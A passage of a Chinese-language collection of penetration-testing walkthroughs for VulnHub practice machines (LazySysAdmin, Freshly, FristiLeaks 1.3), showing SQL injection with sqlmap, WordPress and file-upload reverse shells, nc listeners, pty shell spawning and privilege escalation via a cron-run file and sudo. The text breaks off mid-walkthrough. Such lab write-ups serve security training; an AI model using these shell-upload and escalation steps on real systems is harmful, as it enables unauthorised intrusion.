class="cm-number">33</span>(www-data) <span class="cm-def">groups</span><span class="cm-operator">=</span><span class="cm-number">33</span>(www-data)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">/bin/sh: <span class="cm-number">0</span>: can<span class="cm-string">'t access tty; job control turned off</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-def">$ whoami</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">www-data</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-def">$ id</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-def">uid</span><span class="cm-operator">=</span><span class="cm-number">33</span>(www-data) <span class="cm-def">gid</span><span class="cm-operator">=</span><span class="cm-number">33</span>(www-data) <span class="cm-def">groups</span><span class="cm-operator">=</span><span class="cm-number">33</span>(www-data)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-def">$ sudo</span> <span class="cm-builtin">su</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-builtin">sudo</span>: no tty present and no askpass program specified</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 376px;"></div><div class="CodeMirror-gutters" style="display: none; height: 406px;"></div></div></div></pre><p>出現no tty present and no askpass program specified,剛好目標機有python環境,使用python派生個新的shell。</p><pre class="md-fences md-end-block" lang="bash"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation"><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">python <span class="cm-attribute">-c</span> <span class="cm-string">'import pty; pty.spawn("/bin/sh")'</span></span></pre></div></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 31px;"></div><div class="CodeMirror-gutters" style="display: none; height: 61px;"></div></div></div></pre><p>但是不知道www-data的密碼,所以接下來就要進行提權,先來看一下目標機的詳細信息</p><pre class="md-fences md-end-block" lang="bash"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-def">$ uname</span> <span class="cm-attribute">-r</span></span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-number">4</span>.4.0-31-generic</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-def">$ lsb_release</span> <span class="cm-attribute">-a</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">No LSB modules are available.</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Distributor ID:<span class="cm-tab" role="presentation" cm-text="  "> </span>Ubuntu</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Description:<span class="cm-tab" role="presentation" cm-text="  ">    </span>Ubuntu <span class="cm-number">14</span>.04.5 LTS</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Release:<span class="cm-tab" role="presentation" cm-text="    ">    </span><span class="cm-number">14</span>.04</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Codename:<span class="cm-tab" role="presentation" cm-text="    ">   </span>trusty</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 196px;"></div><div class="CodeMirror-gutters" style="display: none; height: 226px;"></div></div></div></pre><p>所以用CVE-2017-1000112提權即可,但是目標機上沒有gcc,這種情況,可以本地搭建和目標機一樣的環境,在本地編譯好提權exp后,在目標機器上運行即可。</p><p>dirb安裝方法(kali已自帶)</p><pre class="md-fences md-end-block" lang="bash"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-builtin">wget</span> https://svwh.dl.sourceforge.net/project/dirb/dirb/2.22/dirb222.tar.gz</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">tar zxvf dirb222.tar.gz</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-builtin">cd</span> dirb222/</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">apt-get install libcurl4-gnutls-dev</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">./configure && <span class="cm-builtin">make</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">./dirb <span class="cm-comment">#運行即可</span></span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 146px;"></div><div class="CodeMirror-gutters" style="display: none; height: 176px;"></div></div></div></pre><p>參考鏈接:</p><p><a href='https://grokdesigns.com/vulnhub-walkthrough-lazysysadmin-1/'>VulnHub Walk-through – LazySysAdmin: 1</a></p><p><a href='https://uart.io/2017/12/lazysysadmin-1/'>LazySysAdmin Vulnerable Machine Walk-through</a></p><p> </p><h1><a name='header-n8486' class='md-header-anchor '></a>第六節 Freshly</h1><p> </p><h1><a name='header-n8489' class='md-header-anchor '></a>Vulnhub-TopHatSec: Freshly</h1><h2><a name='header-n8490' class='md-header-anchor '></a>靶機簡介</h2><h3><a name='header-n8491' class='md-header-anchor '></a>下載鏈接</h3><p><a href='https://download.vulnhub.com/tophatsec/Freshly.ova' target='_blank' class='url'>https://download.vulnhub.com/tophatsec/Freshly.ova</a></p><h3><a name='header-n8494' class='md-header-anchor '></a>運行環境</h3><ul><li>Virtualbox</li><li>VM(運行會提示錯誤,給的解決鏈接已經404)</li></ul><p>本靶機推薦使用Virtualbox搭建</p><h3><a name='header-n8504' class='md-header-anchor '></a>說明</h3><p>此靶機的目標是通過網絡滲透進主機,並找到隱藏在敏感文件中的秘密。</p><h3><a name='header-n8508' class='md-header-anchor '></a>運行環境</h3><p>將下載的OVA文件導入進Virtualbox即可。</p><h2><a name='header-n8511' class='md-header-anchor '></a>滲透思路</h2><h3><a name='header-n8512' class='md-header-anchor '></a>服務發現</h3><p>端口掃描</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_1.jpg' alt='' referrerPolicy='no-referrer' /></p><p>操作系統識別</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_2.jpg' alt='' referrerPolicy='no-referrer' /></p><p>主要端口進一步掃描</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_3.jpg' alt='' referrerPolicy='no-referrer' /></p><p>80端口</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_4.jpg' alt='' referrerPolicy='no-referrer' /></p><p>8080</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_5.jpg' alt='' referrerPolicy='no-referrer' /></p><p>發現8080和443端口均為Web,使用了WordPress。</p><h3><a name='header-n8535' class='md-header-anchor '></a>檢測已知服務</h3><p>對wordpress進行掃描</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_6.jpg' alt='' referrerPolicy='no-referrer' /></p><p>發現三個插件有安全問題,但是對進一步滲透幫助不大。在掃描同時,使用<code>nikto</code>對80進行目錄掃描,發現phpmyadmin和login.php</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_7.jpg' alt='' referrerPolicy='no-referrer' /></p><p>login.php</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_8.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Sqlmap進行檢測</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_9.jpg' alt='' referrerPolicy='no-referrer' /></p><p>存在注入</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_10.jpg' alt='' referrerPolicy='no-referrer' /></p><p>查看數據庫</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_11.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_12.jpg' alt='' referrerPolicy='no-referrer' /></p><p>查看WordPress8080庫找到wordpress的用戶名和密碼</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_13.jpg' alt='' referrerPolicy='no-referrer' /></p><p>登入后台,修改語言為中文</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_14.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n8570' class='md-header-anchor '></a>獲取shell</h3><p>wordpress有兩種方式拿shell,一種是添加插件,將准備好的格式正確的shell添加到.zip上傳。</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_15.jpg' alt='' referrerPolicy='no-referrer' /></p><p>還有一種是直接編輯</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_16.jpg' alt='' referrerPolicy='no-referrer' /></p><p>這里采用直接編輯的方式getshell。將shell寫入404頁面</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_17.jpg' alt='' referrerPolicy='no-referrer' /></p><p>本地開NC監聽</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_18.jpg' alt='' referrerPolicy='no-referrer' /></p><p>訪問404頁面
Shell反彈</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_19.jpg' alt='' referrerPolicy='no-referrer' /></p><p>查看passwd</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_20.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_21.jpg' alt='' referrerPolicy='no-referrer' /></p><h1><a name='header-n8599' class='md-header-anchor '></a>第七節 FristiLeaks v1.3</h1><h2><a name='header-n8600' class='md-header-anchor '></a>靶機信息</h2><h3><a name='header-n8601' class='md-header-anchor '></a>下載連接</h3><p><a href='https://download.vulnhub.com/fristileaks/FristiLeaks_1.3.ova.torrent' target='_blank' class='url'>https://download.vulnhub.com/fristileaks/FristiLeaks_1.3.ova.torrent</a> 
<a href='https://download.vulnhub.com/fristileaks/FristiLeaks_1.3.ova' target='_blank' class='url'>https://download.vulnhub.com/fristileaks/FristiLeaks_1.3.ova</a></p><h3><a name='header-n8605' class='md-header-anchor '></a>運行環境</h3><ul><li>Virtualbox (二選一)</li><li>Vnware Workstation player</li></ul><h3><a name='header-n8613' class='md-header-anchor '></a>設置</h3><p>根據官網提供的說明,首先要將要求設置VMware虛擬機的MAC地址 08:00:27:A5:A6:76 
<img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_1.jpg' alt='' referrerPolicy='no-referrer' /></p><p>然后開啟VM</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_2.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n8621' class='md-header-anchor '></a>主機發現</h3><p><code>Netdiscover –r 10.10.10.0/24</code></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_3.jpg' alt='' referrerPolicy='no-referrer' /><br/></p><p>可以發現目標主機在10.10.10.132的位置</p><h3><a name='header-n8628' class='md-header-anchor '></a>服務發現</h3><p><code>nmap -sS -Pn -T4 -p- 10.10.10.132</code></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_4.jpg' alt='' referrerPolicy='no-referrer' /></p><p>可以看到打開了80端口,service為HTTP</p><h3><a name='header-n8635' class='md-header-anchor '></a>詳細掃描80端口</h3><p>僅發現開放了80端口,對80端口進行詳細探測:</p><p><code>nmap -A -O -p80 10.10.10.132</code></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_5.jpg' alt='' referrerPolicy='no-referrer' /></p><p>得到以下有價值的信息:</p><pre class="md-fences md-end-block" lang=""> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation"><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">http-robots.txt: 3 disallowed entries</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 54px;"></div><div class="CodeMirror-gutters" style="display: none; height: 84px;"></div></div></div></pre><p>瀏覽一下web站點</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_6.jpg' alt='' referrerPolicy='no-referrer' /></p><p>根據nmap掃描的結果存在<code>robots.txt</code>文件,查看一下:</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_7.jpg' alt='' referrerPolicy='no-referrer' /></p><p>訪問以下<code>robots.txt</code>提到的三個路徑</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_8.jpg' alt='' referrerPolicy='no-referrer' /></p><p>三個目錄內容相同,只有以上畫面。</p><p>接着,枚舉一下目錄:</p><p><code>dirb http://10.10.10.132</code></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_9.jpg' alt='' referrerPolicy='no-referrer' /></p><p>在<code>images</code>目錄發現幾張照片:</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_10.jpg' alt='' referrerPolicy='no-referrer' /></p><p>查看圖片,<code>keep-calm</code>似乎是一個提示</p><p>KEEP CALM AND DRINK FRISTI</p><p>嘗試訪問 <a href='http://10.10.10.132/fristi' target='_blank' class='url'>http://10.10.10.132/fristi</a>/</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_11.jpg' alt='' referrerPolicy='no-referrer' /></p><p>發現一個登陸口。登錄界面存在一個嚴重安全問題,兩個輸入框都有自動完成的功能。(包括密碼)
​   <br/>
<img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_12.jpg' alt='' referrerPolicy='no-referrer' /></p><p>掃描一下該目錄:</p><p><code>dirb http://10.10.10.132/fristi/</code></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_13.jpg' alt='' referrerPolicy='no-referrer' /></p><p>發現了<code>upload</code>目錄的index頁面</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_14.jpg' alt='' referrerPolicy='no-referrer' /></p><p>查看源代碼發現線索:</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_15.jpg' alt='' referrerPolicy='no-referrer' /></p><p>注釋當中的信息表明,此頁面是一個叫eezeepz的人留下來的。</p><p>推測,<code>eezeepz</code>或許是賬號或者密碼</p><p>繼續向下,發現一大塊用base64編碼的字符串</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_16.jpg' alt='' referrerPolicy='no-referrer' /></p><p>復制,寫入一個文件,之后使用命令解碼:</p><p><code>base64 -d /tmp/encoded.txt</code></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_17.jpg' alt='' referrerPolicy='no-referrer' /></p><p>根據文件格式,這是一個PNG格式的圖畫,保存為PNG格式</p><p><code>base64 -d /tmp/encoded.txt > decoded.png</code></p><p>查看發現一串字符串</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_18.jpg' alt='' referrerPolicy='no-referrer' /></p><p>嘗試使用以上獲取的信息進行登錄:</p><pre class="md-fences md-end-block" lang=""> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation"><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">username:eezeepz</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">password:keKkeKKeKKeKkEkkEk</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 54px;"></div><div class="CodeMirror-gutters" style="display: none; height: 84px;"></div></div></div></pre><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_19.jpg' alt='' referrerPolicy='no-referrer' /></p><p>登陸成功,發現文件上傳。此上傳點未做任何過濾,可以直接上傳shell文件。</p><p>反彈Shell的腳本木馬可以在這里下載:<a href='http://pentestmonkey.net/tools/web-shells/php-reverse-shell' target='_blank' class='url'>http://pentestmonkey.net/tools/web-shells/php-reverse-shell</a></p><pre class="md-fences md-end-block" lang="bash"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation"><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-builtin">cp</span> /usr/share/webshells/php/php-reverse-shell.php reverse-shell.php</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-builtin">vi</span> reverse-shell.php</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 54px;"></div><div class="CodeMirror-gutters" style="display: none; height: 84px;"></div></div></div></pre><p>修改反彈shell的ip地址和監聽端口。</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_20.jpg' alt='' referrerPolicy='no-referrer' /></p><p>使用<code>nc</code>監聽端口:</p><p><code>nc -nlvp 8888</code></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_21.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>根據回顯,只有png, jpg, gif 能上傳</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_22.jpg' alt='' referrerPolicy='no-referrer' /></p><p>修改一下文件名,后綴加上<code>.jpg</code></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_23.jpg' alt='' referrerPolicy='no-referrer' />
​   <br/>
上傳成功,打開上傳的shell:
​   <br/>
<img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_24.jpg' alt='' referrerPolicy='no-referrer' /></p><p>現在已經得到了一個低端權限
​   <br/>
<img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_25.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n8754' class='md-header-anchor '></a>權限提升</h3><p>翻看一下目錄,在<code>home</code>目錄</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_27.jpg' alt='' referrerPolicy='no-referrer' />
​   <br/>
看到關鍵人物eezeepz的家目錄</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_28.jpg' alt='' referrerPolicy='no-referrer' /></p><p>在<code>notes.txt</code>當中得到提示:
​   <br/>
<img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_29.jpg' alt='' referrerPolicy='no-referrer' /></p><p>根據提示說明,在/tmp下創建一個<code>runtis</code>文件</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_30.jpg' alt='' referrerPolicy='no-referrer' />
​   <br/></p><h3><a name='header-n8772' class='md-header-anchor '></a>賦予權限</h3><p>根據<code>notes.txt</code>的提示,在<code>/tmp/runtis</code>當中寫入的命令會定時執行,那么,修改<code>/home/admin</code>目錄的權限。</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_31.jpg' alt='' referrerPolicy='no-referrer' />
​   <br/>
等待系統執行命令之后,就可以閱讀 <code>/home/admin</code> 下的內容了</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_32.jpg' alt='' referrerPolicy='no-referrer' /></p><p>有幾個文件。依次看一下。</p><p>cryptpass.py</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_33.jpg' alt='' referrerPolicy='no-referrer' /> 
Cryptepass.txt
​  <br/>
<img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_34.jpg' alt='' referrerPolicy='no-referrer' /> 
whoisyourgodnow.txt</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_35.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>看樣子應該是用了py文件去加密的。
重寫一下文件:
​   <br/>
<img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_36.jpg' alt='' referrerPolicy='no-referrer' /></p><p>解密試試
​   <br/>
<img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_37.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_38.jpg' alt='' referrerPolicy='no-referrer' />
​   <br/>
分別得到</p><pre class="md-fences md-end-block" lang=""> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation"><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">1.mVGZ3O3omkJLmy2pcuTq  :thisisalsopw123</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">2.=RFn0AKnlMHMPIzpyuTI0ITG :LetThereBeFristi!</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 54px;"></div><div class="CodeMirror-gutters" style="display: none; height: 84px;"></div></div></div></pre><p>這有可能是用戶fristgod 的密碼,組合試試</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_39.jpg' alt='' referrerPolicy='no-referrer' />
​   <br/>
根據報錯信息,查了資料:
跟 su 命令的實現有關; B環境上su的實現應該是判斷標准輸入是不是tty ; 而A環境上su的實現則允許從其他文件讀取密碼。</p><p>解決方法如下:</p><p><code>Python -c 'import pty;pty.spawn("/bin/sh")'</code></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_40.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>接下來就可以正常使用了。</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_41.jpg' alt='' referrerPolicy='no-referrer' />
​      <br/>
查看一下目錄文件:</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_43.jpg' alt='' referrerPolicy='no-referrer' /></p><p>查看<code>.secret_admin_stuff</code>目錄文件:</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_45.jpg' alt='' referrerPolicy='no-referrer' />
​    
發現這個是個root的文件
權限應該是不夠的</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_46.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>查看命令使用記錄,<code>history</code>命令執行結果:</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_47.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>可以看到<code>fristigod</code>用戶一直sudo來執行命令</p><p>嘗試輸入之前得到的兩個密碼:</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_50.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>成功登陸:</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_51.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>使用<code>sudo</code>提升權限,並創建一個shell:</p><p><code>sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash</code></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_52.jpg' alt='' referrerPolicy='no-referrer' />
​    
